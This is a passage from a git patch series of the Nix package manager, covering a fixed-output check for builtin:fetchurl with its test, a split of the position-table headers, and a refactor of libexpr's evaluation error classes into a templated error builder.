*/ steady_time_point lastWokenUp; From 58c26dd0f0090bfd1460f138f9ba17eda8a8ab5b Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 1 Feb 2024 01:01:39 +0100 Subject: [PATCH 373/654] Add .clang-tidy --- .clang-tidy | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 .clang-tidy diff --git a/.clang-tidy b/.clang-tidy new file mode 100644 index 000000000..0887b8670 --- /dev/null +++ b/.clang-tidy @@ -0,0 +1,3 @@ +# We use pointers to aggregates in a couple of places, intentionally. +# void * would look weird. +Checks: '-bugprone-sizeof-expression' From 1ee42c5b88eb0533ebcf8b2579ec82f2be80e4b2 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 1 Feb 2024 21:46:01 +0100 Subject: [PATCH 374/654] builtin:fetchurl: Ensure a fixed-output derivation Previously we didn't check that the derivation was fixed-output, so you could use builtin:fetchurl to impurely fetch a file. --- src/libstore/builtins/fetchurl.cc | 3 +++ tests/functional/fetchurl.sh | 3 +++ 2 files changed, 6 insertions(+) diff --git a/src/libstore/builtins/fetchurl.cc b/src/libstore/builtins/fetchurl.cc index 2086bd0b9..cf7b2770f 100644 --- a/src/libstore/builtins/fetchurl.cc +++ b/src/libstore/builtins/fetchurl.cc @@ -16,6 +16,9 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) writeFile(settings.netrcFile, netrcData, 0600); } + if (!drv.type().isFixed()) + throw Error("'builtin:fetchurl' must be a fixed-output derivation"); + auto getAttr = [&](const std::string & name) { auto i = drv.env.find(name); if (i == drv.env.end()) throw Error("attribute '%s' missing", name); diff --git a/tests/functional/fetchurl.sh b/tests/functional/fetchurl.sh index 8cd40c09f..578f5a34c 100644 --- a/tests/functional/fetchurl.sh +++ b/tests/functional/fetchurl.sh @@ -78,3 +78,6 @@ outPath=$(nix-build -vvvvv --expr 'import ' --argstr url file: test -x $outPath/fetchurl.sh test -L $outPath/symlink + +# Make sure that *not* passing an outputHash fails. 
+expectStderr 100 nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output derivation' From b8b739e484078863c10c48d031fa8459081ba8b3 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 1 Feb 2024 22:01:02 +0100 Subject: [PATCH 375/654] builtin:fetchurl: Get output hash info from the drv --- src/libstore/builtins/fetchurl.cc | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/src/libstore/builtins/fetchurl.cc b/src/libstore/builtins/fetchurl.cc index cf7b2770f..a9f2e748e 100644 --- a/src/libstore/builtins/fetchurl.cc +++ b/src/libstore/builtins/fetchurl.cc @@ -16,7 +16,12 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) writeFile(settings.netrcFile, netrcData, 0600); } - if (!drv.type().isFixed()) + auto out = get(drv.outputs, "out"); + if (!out) + throw Error("'builtin:fetchurl' requires an 'out' output"); + + auto dof = std::get_if(&out->raw); + if (!dof) throw Error("'builtin:fetchurl' must be a fixed-output derivation"); auto getAttr = [&](const std::string & name) { @@ -62,13 +67,11 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) }; /* Try the hashed mirrors first. 
*/ - if (getAttr("outputHashMode") == "flat") + if (dof->ca.method.getFileIngestionMethod() == FileIngestionMethod::Flat) for (auto hashedMirror : settings.hashedMirrors.get()) try { if (!hasSuffix(hashedMirror, "/")) hashedMirror += '/'; - std::optional ht = parseHashAlgoOpt(getAttr("outputHashAlgo")); - Hash h = newHashAllowEmpty(getAttr("outputHash"), ht); - fetch(hashedMirror + printHashAlgo(h.algo) + "/" + h.to_string(HashFormat::Base16, false)); + fetch(hashedMirror + printHashAlgo(dof->ca.hash.algo) + "/" + dof->ca.hash.to_string(HashFormat::Base16, false)); return; } catch (Error & e) { debug(e.what()); From c62c21e29af20f1c14a59ab37d7a25dd0b70f69e Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 1 Feb 2024 13:07:45 -0800 Subject: [PATCH 376/654] Move `PodIdx` to `pos-idx.hh` and `PosTable` to `pos-table.hh` --- src/libexpr/nixexpr.hh | 86 +--------------------------------------- src/libexpr/pos-idx.hh | 48 ++++++++++++++++++++++ src/libexpr/pos-table.hh | 83 ++++++++++++++++++++++++++++++++++++++ 3 files changed, 133 insertions(+), 84 deletions(-) create mode 100644 src/libexpr/pos-idx.hh create mode 100644 src/libexpr/pos-table.hh diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index b6189c2a9..da0ec6e9d 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -9,6 +9,8 @@ #include "error.hh" #include "chunked-vector.hh" #include "position.hh" +#include "pos-idx.hh" +#include "pos-table.hh" namespace nix { @@ -29,90 +31,6 @@ public: using EvalError::EvalError; }; -class PosIdx { - friend class PosTable; - -private: - uint32_t id; - - explicit PosIdx(uint32_t id): id(id) {} - -public: - PosIdx() : id(0) {} - - explicit operator bool() const { return id > 0; } - - bool operator <(const PosIdx other) const { return id < other.id; } - - bool operator ==(const PosIdx other) const { return id == other.id; } - - bool operator !=(const PosIdx other) const { return id != other.id; } -}; - -class PosTable -{ -public: - class Origin { 
- friend PosTable; - private: - // must always be invalid by default, add() replaces this with the actual value. - // subsequent add() calls use this index as a token to quickly check whether the - // current origins.back() can be reused or not. - mutable uint32_t idx = std::numeric_limits::max(); - - // Used for searching in PosTable::[]. - explicit Origin(uint32_t idx): idx(idx), origin{std::monostate()} {} - - public: - const Pos::Origin origin; - - Origin(Pos::Origin origin): origin(origin) {} - }; - - struct Offset { - uint32_t line, column; - }; - -private: - std::vector origins; - ChunkedVector offsets; - -public: - PosTable(): offsets(1024) - { - origins.reserve(1024); - } - - PosIdx add(const Origin & origin, uint32_t line, uint32_t column) - { - const auto idx = offsets.add({line, column}).second; - if (origins.empty() || origins.back().idx != origin.idx) { - origin.idx = idx; - origins.push_back(origin); - } - return PosIdx(idx + 1); - } - - Pos operator[](PosIdx p) const - { - if (p.id == 0 || p.id > offsets.size()) - return {}; - const auto idx = p.id - 1; - /* we want the last key <= idx, so we'll take prev(first key > idx). - this is guaranteed to never rewind origin.begin because the first - key is always 0. 
*/ - const auto pastOrigin = std::upper_bound( - origins.begin(), origins.end(), Origin(idx), - [] (const auto & a, const auto & b) { return a.idx < b.idx; }); - const auto origin = *std::prev(pastOrigin); - const auto offset = offsets[idx]; - return {offset.line, offset.column, origin.origin}; - } -}; - -inline PosIdx noPos = {}; - - struct Env; struct Value; class EvalState; diff --git a/src/libexpr/pos-idx.hh b/src/libexpr/pos-idx.hh new file mode 100644 index 000000000..9949f1dc5 --- /dev/null +++ b/src/libexpr/pos-idx.hh @@ -0,0 +1,48 @@ +#pragma once + +#include + +namespace nix { + +class PosIdx +{ + friend class PosTable; + +private: + uint32_t id; + + explicit PosIdx(uint32_t id) + : id(id) + { + } + +public: + PosIdx() + : id(0) + { + } + + explicit operator bool() const + { + return id > 0; + } + + bool operator<(const PosIdx other) const + { + return id < other.id; + } + + bool operator==(const PosIdx other) const + { + return id == other.id; + } + + bool operator!=(const PosIdx other) const + { + return id != other.id; + } +}; + +inline PosIdx noPos = {}; + +} diff --git a/src/libexpr/pos-table.hh b/src/libexpr/pos-table.hh new file mode 100644 index 000000000..1decf3c85 --- /dev/null +++ b/src/libexpr/pos-table.hh @@ -0,0 +1,83 @@ +#pragma once + +#include +#include +#include + +#include "chunked-vector.hh" +#include "pos-idx.hh" +#include "position.hh" + +namespace nix { + +class PosTable +{ +public: + class Origin + { + friend PosTable; + private: + // must always be invalid by default, add() replaces this with the actual value. + // subsequent add() calls use this index as a token to quickly check whether the + // current origins.back() can be reused or not. + mutable uint32_t idx = std::numeric_limits::max(); + + // Used for searching in PosTable::[]. 
+ explicit Origin(uint32_t idx) + : idx(idx) + , origin{std::monostate()} + { + } + + public: + const Pos::Origin origin; + + Origin(Pos::Origin origin) + : origin(origin) + { + } + }; + + struct Offset + { + uint32_t line, column; + }; + +private: + std::vector origins; + ChunkedVector offsets; + +public: + PosTable() + : offsets(1024) + { + origins.reserve(1024); + } + + PosIdx add(const Origin & origin, uint32_t line, uint32_t column) + { + const auto idx = offsets.add({line, column}).second; + if (origins.empty() || origins.back().idx != origin.idx) { + origin.idx = idx; + origins.push_back(origin); + } + return PosIdx(idx + 1); + } + + Pos operator[](PosIdx p) const + { + if (p.id == 0 || p.id > offsets.size()) + return {}; + const auto idx = p.id - 1; + /* we want the last key <= idx, so we'll take prev(first key > idx). + this is guaranteed to never rewind origin.begin because the first + key is always 0. */ + const auto pastOrigin = std::upper_bound( + origins.begin(), origins.end(), Origin(idx), [](const auto & a, const auto & b) { return a.idx < b.idx; }); + const auto origin = *std::prev(pastOrigin); + const auto offset = offsets[idx]; + return {offset.line, offset.column, origin.origin}; + } +}; + +} From c6a89c1a1659b31694c0fbcd21d78a6dd521c732 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 22 Jan 2024 17:08:29 -0800 Subject: [PATCH 377/654] libexpr: Support structured error classes While preparing PRs like #9753, I've had to change error messages in dozens of code paths. It would be nice if instead of EvalError("expected 'boolean' but found '%1%'", showType(v)) we could write TypeError(v, "boolean") or similar. Then, changing the error message could be a mechanical refactor with the compiler pointing out places the constructor needs to be changed, rather than the error-prone process of grepping through the codebase. 
Structured errors would also help prevent the "same" error from having multiple slightly different messages, and could be a first step towards error codes / an error index. This PR reworks the exception infrastructure in `libexpr` to support exception types with different constructor signatures than `BaseError`. Actually refactoring the exceptions to use structured data will come in a future PR (this one is big enough already, as it has to touch every exception in `libexpr`). The core design is in `eval-error.hh`. Generally, errors like this: state.error("'%s' is not a string", getAttrPathStr()) .debugThrow() are transformed like this: state.error("'%s' is not a string", getAttrPathStr()) .debugThrow() The type annotation has moved from `ErrorBuilder::debugThrow` to `EvalState::error`. --- src/libcmd/repl.cc | 2 - src/libexpr/attr-path.cc | 8 +- src/libexpr/eval-cache.cc | 30 +-- src/libexpr/eval-error.cc | 113 ++++++++ src/libexpr/eval-error.hh | 118 +++++++++ src/libexpr/eval-inline.hh | 19 +- src/libexpr/eval.cc | 217 +++++++--------- src/libexpr/eval.hh | 91 +------ src/libexpr/flake/flake.cc | 16 +- src/libexpr/get-drvs.cc | 5 +- src/libexpr/json-to-value.cc | 4 +- src/libexpr/json-to-value.hh | 7 +- src/libexpr/lexer.l | 12 +- src/libexpr/nixexpr.cc | 8 +- src/libexpr/nixexpr.hh | 17 +- src/libexpr/parser-state.hh | 8 +- src/libexpr/parser.y | 8 +- src/libexpr/primops.cc | 244 ++++++++---------- src/libexpr/primops/context.cc | 50 ++-- src/libexpr/primops/fetchClosure.cc | 22 +- src/libexpr/primops/fetchMercurial.cc | 10 +- src/libexpr/primops/fetchTree.cc | 68 ++--- src/libexpr/primops/fromTOML.cc | 5 +- src/libexpr/value-to-json.cc | 18 +- src/libexpr/value.hh | 2 +- src/libmain/shared.cc | 2 +- src/libstore/build/entry-points.cc | 4 +- src/libstore/daemon.cc | 2 +- src/libutil/error.cc | 6 +- src/libutil/error.hh | 27 +- src/libutil/logging.cc | 2 +- src/nix-store/nix-store.cc | 4 +- src/nix/eval.cc | 2 +- src/nix/flake.cc | 6 +- 
tests/functional/fetchGit.sh | 4 +- .../lang/eval-fail-attr-name-type.err.exp | 5 + .../eval-fail-fromTOML-timestamps.err.exp | 2 +- .../functional/lang/eval-fail-toJSON.err.exp | 5 + .../eval-fail-using-set-as-attr-name.err.exp | 5 + tests/unit/libexpr/error_traces.cc | 20 +- 40 files changed, 653 insertions(+), 545 deletions(-) create mode 100644 src/libexpr/eval-error.cc create mode 100644 src/libexpr/eval-error.hh diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index d7d8f9819..714d3adb5 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -422,8 +422,6 @@ StringSet NixRepl::completePrefix(const std::string & prefix) // Quietly ignore parse errors. } catch (EvalError & e) { // Quietly ignore evaluation errors. - } catch (UndefinedVarError & e) { - // Quietly ignore undefined variable errors. } catch (BadURL & e) { // Quietly ignore BadURL flake-related errors. } diff --git a/src/libexpr/attr-path.cc b/src/libexpr/attr-path.cc index 7481a2232..d6befd362 100644 --- a/src/libexpr/attr-path.cc +++ b/src/libexpr/attr-path.cc @@ -65,10 +65,10 @@ std::pair findAlongAttrPath(EvalState & state, const std::strin if (!attrIndex) { if (v->type() != nAttrs) - throw TypeError( + state.error( "the expression selected by the selection path '%1%' should be a set but is %2%", attrPath, - showType(*v)); + showType(*v)).debugThrow(); if (attr.empty()) throw Error("empty attribute name in selection path '%1%'", attrPath); @@ -88,10 +88,10 @@ std::pair findAlongAttrPath(EvalState & state, const std::strin else { if (!v->isList()) - throw TypeError( + state.error( "the expression selected by the selection path '%1%' should be a list but is %2%", attrPath, - showType(*v)); + showType(*v)).debugThrow(); if (*attrIndex >= v->listSize()) throw AttrPathNotFound("list index %1% in selection path '%2%' is out of range", *attrIndex, attrPath); diff --git a/src/libexpr/eval-cache.cc b/src/libexpr/eval-cache.cc index 5808d58b6..2fc69e796 100644 --- a/src/libexpr/eval-cache.cc +++ 
b/src/libexpr/eval-cache.cc @@ -491,7 +491,7 @@ std::shared_ptr AttrCursor::maybeGetAttr(Symbol name, bool forceErro if (forceErrors) debug("reevaluating failed cached attribute '%s'", getAttrPathStr(name)); else - throw CachedEvalError("cached failure of attribute '%s'", getAttrPathStr(name)); + throw CachedEvalError(root->state, "cached failure of attribute '%s'", getAttrPathStr(name)); } else return std::make_shared(root, std::make_pair(shared_from_this(), name), nullptr, std::move(attr)); @@ -500,7 +500,7 @@ std::shared_ptr AttrCursor::maybeGetAttr(Symbol name, bool forceErro // evaluate to see whether 'name' exists } else return nullptr; - //throw TypeError("'%s' is not an attribute set", getAttrPathStr()); + //error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); } } @@ -508,7 +508,7 @@ std::shared_ptr AttrCursor::maybeGetAttr(Symbol name, bool forceErro if (v.type() != nAttrs) return nullptr; - //throw TypeError("'%s' is not an attribute set", getAttrPathStr()); + //error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); auto attr = v.attrs->get(name); @@ -574,14 +574,14 @@ std::string AttrCursor::getString() debug("using cached string attribute '%s'", getAttrPathStr()); return s->first; } else - root->state.error("'%s' is not a string", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a string", getAttrPathStr()).debugThrow(); } } auto & v = forceValue(); if (v.type() != nString && v.type() != nPath) - root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow(); return v.type() == nString ? 
v.c_str() : v.path().to_string(); } @@ -616,7 +616,7 @@ string_t AttrCursor::getStringWithContext() return *s; } } else - root->state.error("'%s' is not a string", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a string", getAttrPathStr()).debugThrow(); } } @@ -630,7 +630,7 @@ string_t AttrCursor::getStringWithContext() else if (v.type() == nPath) return {v.path().to_string(), {}}; else - root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow(); } bool AttrCursor::getBool() @@ -643,14 +643,14 @@ bool AttrCursor::getBool() debug("using cached Boolean attribute '%s'", getAttrPathStr()); return *b; } else - root->state.error("'%s' is not a Boolean", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a Boolean", getAttrPathStr()).debugThrow(); } } auto & v = forceValue(); if (v.type() != nBool) - root->state.error("'%s' is not a Boolean", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a Boolean", getAttrPathStr()).debugThrow(); return v.boolean; } @@ -665,14 +665,14 @@ NixInt AttrCursor::getInt() debug("using cached integer attribute '%s'", getAttrPathStr()); return i->x; } else - throw TypeError("'%s' is not an integer", getAttrPathStr()); + root->state.error("'%s' is not an integer", getAttrPathStr()).debugThrow(); } } auto & v = forceValue(); if (v.type() != nInt) - throw TypeError("'%s' is not an integer", getAttrPathStr()); + root->state.error("'%s' is not an integer", getAttrPathStr()).debugThrow(); return v.integer; } @@ -687,7 +687,7 @@ std::vector AttrCursor::getListOfStrings() debug("using cached list of strings attribute '%s'", getAttrPathStr()); return *l; } else - throw TypeError("'%s' is not a list of strings", getAttrPathStr()); + root->state.error("'%s' is not a list of strings", getAttrPathStr()).debugThrow(); } } @@ -697,7 +697,7 @@ std::vector AttrCursor::getListOfStrings() 
root->state.forceValue(v, noPos); if (v.type() != nList) - throw TypeError("'%s' is not a list", getAttrPathStr()); + root->state.error("'%s' is not a list", getAttrPathStr()).debugThrow(); std::vector res; @@ -720,14 +720,14 @@ std::vector AttrCursor::getAttrs() debug("using cached attrset attribute '%s'", getAttrPathStr()); return *attrs; } else - root->state.error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); } } auto & v = forceValue(); if (v.type() != nAttrs) - root->state.error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); std::vector attrs; for (auto & attr : *getValue().attrs) diff --git a/src/libexpr/eval-error.cc b/src/libexpr/eval-error.cc new file mode 100644 index 000000000..b9411cbf4 --- /dev/null +++ b/src/libexpr/eval-error.cc @@ -0,0 +1,113 @@ +#include "eval-error.hh" +#include "eval.hh" +#include "value.hh" + +namespace nix { + +template +EvalErrorBuilder & EvalErrorBuilder::withExitStatus(unsigned int exitStatus) +{ + error.withExitStatus(exitStatus); + return *this; +} + +template +EvalErrorBuilder & EvalErrorBuilder::atPos(PosIdx pos) +{ + error.err.pos = error.state.positions[pos]; + return *this; +} + +template +EvalErrorBuilder & EvalErrorBuilder::atPos(Value & value, PosIdx fallback) +{ + return atPos(value.determinePos(fallback)); +} + +template +EvalErrorBuilder & EvalErrorBuilder::withTrace(PosIdx pos, const std::string_view text) +{ + error.err.traces.push_front( + Trace{.pos = error.state.positions[pos], .hint = hintfmt(std::string(text)), .frame = false}); + return *this; +} + +template +EvalErrorBuilder & EvalErrorBuilder::withFrameTrace(PosIdx pos, const std::string_view text) +{ + error.err.traces.push_front( + Trace{.pos = error.state.positions[pos], .hint = hintformat(std::string(text)), .frame = true}); + return *this; +} + 
+template +EvalErrorBuilder & EvalErrorBuilder::withSuggestions(Suggestions & s) +{ + error.err.suggestions = s; + return *this; +} + +template +EvalErrorBuilder & EvalErrorBuilder::withFrame(const Env & env, const Expr & expr) +{ + // NOTE: This is abusing side-effects. + // TODO: check compatibility with nested debugger calls. + // TODO: What side-effects?? + error.state.debugTraces.push_front(DebugTrace{ + .pos = error.state.positions[expr.getPos()], + .expr = expr, + .env = env, + .hint = hintformat("Fake frame for debugging purposes"), + .isError = true}); + return *this; +} + +template +EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, hintformat hint, bool frame) +{ + error.addTrace(error.state.positions[pos], hint, frame); + return *this; +} + +template +template +EvalErrorBuilder & +EvalErrorBuilder::addTrace(PosIdx pos, std::string_view formatString, const Args &... formatArgs) +{ + + addTrace(error.state.positions[pos], hintfmt(std::string(formatString), formatArgs...)); + return *this; +} + +template +void EvalErrorBuilder::debugThrow() +{ + if (error.state.debugRepl && !error.state.debugTraces.empty()) { + const DebugTrace & last = error.state.debugTraces.front(); + const Env * env = &last.env; + const Expr * expr = &last.expr; + error.state.runDebugRepl(&error, *env, *expr); + } + + // `EvalState` is the only class that can construct an `EvalErrorBuilder`, + // and it does so in dynamic storage. This is the final method called on + // any such instance and must delete itself before throwing the underlying + // error.
+ auto error = std::move(this->error); + delete this; + + throw error; +} + +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; + +} diff --git a/src/libexpr/eval-error.hh b/src/libexpr/eval-error.hh new file mode 100644 index 000000000..ee69dce64 --- /dev/null +++ b/src/libexpr/eval-error.hh @@ -0,0 +1,118 @@ +#pragma once + +#include + +#include "error.hh" +#include "pos-idx.hh" + +namespace nix { + +struct Env; +struct Expr; +struct Value; + +class EvalState; +template +class EvalErrorBuilder; + +class EvalError : public Error +{ + template + friend class EvalErrorBuilder; +public: + EvalState & state; + + EvalError(EvalState & state, ErrorInfo && errorInfo) + : Error(errorInfo) + , state(state) + { + } + + template + explicit EvalError(EvalState & state, const std::string & formatString, const Args &... formatArgs) + : Error(formatString, formatArgs...) + , state(state) + { + } +}; + +MakeError(ParseError, Error); +MakeError(AssertionError, EvalError); +MakeError(ThrownError, AssertionError); +MakeError(Abort, EvalError); +MakeError(TypeError, EvalError); +MakeError(UndefinedVarError, EvalError); +MakeError(MissingArgumentError, EvalError); +MakeError(CachedEvalError, EvalError); +MakeError(InfiniteRecursionError, EvalError); + +struct InvalidPathError : public EvalError +{ +public: + Path path; + InvalidPathError(EvalState & state, const Path & path) + : EvalError(state, "path '%s' is not valid", path) + { + } +}; + +template +class EvalErrorBuilder final +{ + friend class EvalState; + + template + explicit EvalErrorBuilder(EvalState & state, const Args &... 
args) + : error(T(state, args...)) + { + } + +public: + T error; + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & withExitStatus(unsigned int exitStatus); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & atPos(PosIdx pos); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & atPos(Value & value, PosIdx fallback = noPos); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & withTrace(PosIdx pos, const std::string_view text); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & withFrameTrace(PosIdx pos, const std::string_view text); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & withSuggestions(Suggestions & s); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & withFrame(const Env & e, const Expr & ex); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, hintformat hint, bool frame = false); + + template + [[nodiscard, gnu::noinline]] EvalErrorBuilder & + addTrace(PosIdx pos, std::string_view formatString, const Args &... formatArgs); + + [[gnu::noinline, gnu::noreturn]] void debugThrow(); +}; + +/** + * The size needed to allocate any `EvalErrorBuilder`. + * + * The list of classes here needs to be kept in sync with the list of `template + * class` declarations in `eval-error.cc`. + * + * This is used by `EvalState` to preallocate a buffer of sufficient size for + * any `EvalErrorBuilder` to avoid allocating while evaluating Nix code. 
+ */ +constexpr size_t EVAL_ERROR_BUILDER_SIZE = std::max({ + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), +}); + +} diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index 42cb68bbe..03320c7c9 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -3,6 +3,7 @@ #include "print.hh" #include "eval.hh" +#include "eval-error.hh" namespace nix { @@ -115,10 +116,11 @@ inline void EvalState::forceAttrs(Value & v, Callable getPos, std::string_view e PosIdx pos = getPos(); forceValue(v, pos); if (v.type() != nAttrs) { - error("expected a set but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .withTrace(pos, errorCtx).debugThrow(); + error( + "expected a set but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).withTrace(pos, errorCtx).debugThrow(); } } @@ -128,10 +130,11 @@ inline void EvalState::forceList(Value & v, const PosIdx pos, std::string_view e { forceValue(v, pos); if (!v.isList()) { - error("expected a list but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .withTrace(pos, errorCtx).debugThrow(); + error( + "expected a list but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).withTrace(pos, errorCtx).debugThrow(); } } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..ded4415cc 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -339,46 +339,6 @@ void initGC() gcInitialised = true; } - -ErrorBuilder & ErrorBuilder::atPos(PosIdx pos) -{ - info.errPos = state.positions[pos]; - return *this; -} - -ErrorBuilder & ErrorBuilder::withTrace(PosIdx pos, const std::string_view text) -{ - info.traces.push_front(Trace{ .pos = state.positions[pos], .hint 
= hintformat(std::string(text)), .frame = false }); - return *this; -} - -ErrorBuilder & ErrorBuilder::withFrameTrace(PosIdx pos, const std::string_view text) -{ - info.traces.push_front(Trace{ .pos = state.positions[pos], .hint = hintformat(std::string(text)), .frame = true }); - return *this; -} - -ErrorBuilder & ErrorBuilder::withSuggestions(Suggestions & s) -{ - info.suggestions = s; - return *this; -} - -ErrorBuilder & ErrorBuilder::withFrame(const Env & env, const Expr & expr) -{ - // NOTE: This is abusing side-effects. - // TODO: check compatibility with nested debugger calls. - state.debugTraces.push_front(DebugTrace { - .pos = nullptr, - .expr = expr, - .env = env, - .hint = hintformat("Fake frame for debugging purposes"), - .isError = true - }); - return *this; -} - - EvalState::EvalState( const SearchPath & _searchPath, ref store, @@ -811,7 +771,7 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr & ? std::make_unique( *this, DebugTrace { - .pos = error->info().errPos ? error->info().errPos : positions[expr.getPos()], + .pos = error->info().pos ? error->info().pos : positions[expr.getPos()], .expr = expr, .env = env, .hint = error->info().msg, @@ -930,7 +890,7 @@ inline Value * EvalState::lookupVar(Env * env, const ExprVar & var, bool noEval) return j->value; } if (!fromWith->parentWith) - error("undefined variable '%1%'", symbols[var.name]).atPos(var.pos).withFrame(*env, var).debugThrow(); + error("undefined variable '%1%'", symbols[var.name]).atPos(var.pos).withFrame(*env, var).debugThrow(); for (size_t l = fromWith->prevWith; l; --l, env = env->up) ; fromWith = fromWith->parentWith; } @@ -1136,7 +1096,7 @@ void EvalState::evalFile(const SourcePath & path, Value & v, bool mustBeTrivial) // computation. 
if (mustBeTrivial && !(dynamic_cast(e))) - error("file '%s' must be an attribute set", path).debugThrow(); + error("file '%s' must be an attribute set", path).debugThrow(); eval(e, v); } catch (Error & e) { addErrorTrace(e, "while evaluating the file '%1%':", resolvedPath.to_string()); @@ -1167,10 +1127,11 @@ inline bool EvalState::evalBool(Env & env, Expr * e, const PosIdx pos, std::stri Value v; e->eval(*this, env, v); if (v.type() != nBool) - error("expected a Boolean but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .withFrame(env, *e).debugThrow(); + error( + "expected a Boolean but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).withFrame(env, *e).debugThrow(); return v.boolean; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -1184,10 +1145,11 @@ inline void EvalState::evalAttrs(Env & env, Expr * e, Value & v, const PosIdx po try { e->eval(*this, env, v); if (v.type() != nAttrs) - error("expected a set but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .withFrame(env, *e).debugThrow(); + error( + "expected a set but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).withFrame(env, *e).debugThrow(); } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; @@ -1296,7 +1258,7 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v) auto nameSym = state.symbols.create(nameVal.string_view()); Bindings::iterator j = v.attrs->find(nameSym); if (j != v.attrs->end()) - state.error("dynamic attribute '%1%' already defined at %2%", state.symbols[nameSym], state.positions[j->pos]).atPos(i.pos).withFrame(env, *this).debugThrow(); + state.error("dynamic attribute '%1%' already defined at %2%", state.symbols[nameSym], state.positions[j->pos]).atPos(i.pos).withFrame(env, *this).debugThrow(); i.valueExpr->setName(nameSym); /* Keep sorted order so find can catch duplicates */ @@ -1408,8 +1370,8 @@ void 
ExprSelect::eval(EvalState & state, Env & env, Value & v) for (auto & attr : *vAttrs->attrs) allAttrNames.insert(state.symbols[attr.name]); auto suggestions = Suggestions::bestMatches(allAttrNames, state.symbols[name]); - state.error("attribute '%1%' missing", state.symbols[name]) - .atPos(pos).withSuggestions(suggestions).withFrame(env, *this).debugThrow(); + state.error("attribute '%1%' missing", state.symbols[name]) + .atPos(pos).withSuggestions(suggestions).withFrame(env, *this).debugThrow(); } } vAttrs = j->value; @@ -1482,7 +1444,7 @@ public: void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & vRes, const PosIdx pos) { if (callDepth > evalSettings.maxCallDepth) - error("stack overflow; max-call-depth exceeded").atPos(pos).template debugThrow(); + error("stack overflow; max-call-depth exceeded").atPos(pos).debugThrow(); CallDepth _level(callDepth); auto trace = evalSettings.traceFunctionCalls @@ -1540,13 +1502,13 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & auto j = args[0]->attrs->get(i.name); if (!j) { if (!i.def) { - error("function '%1%' called without required argument '%2%'", + error("function '%1%' called without required argument '%2%'", (lambda.name ? std::string(symbols[lambda.name]) : "anonymous lambda"), symbols[i.name]) .atPos(lambda.pos) .withTrace(pos, "from call site") .withFrame(*fun.lambda.env, lambda) - .debugThrow(); + .debugThrow(); } env2.values[displ++] = i.def->maybeThunk(*this, env2); } else { @@ -1566,14 +1528,14 @@ void 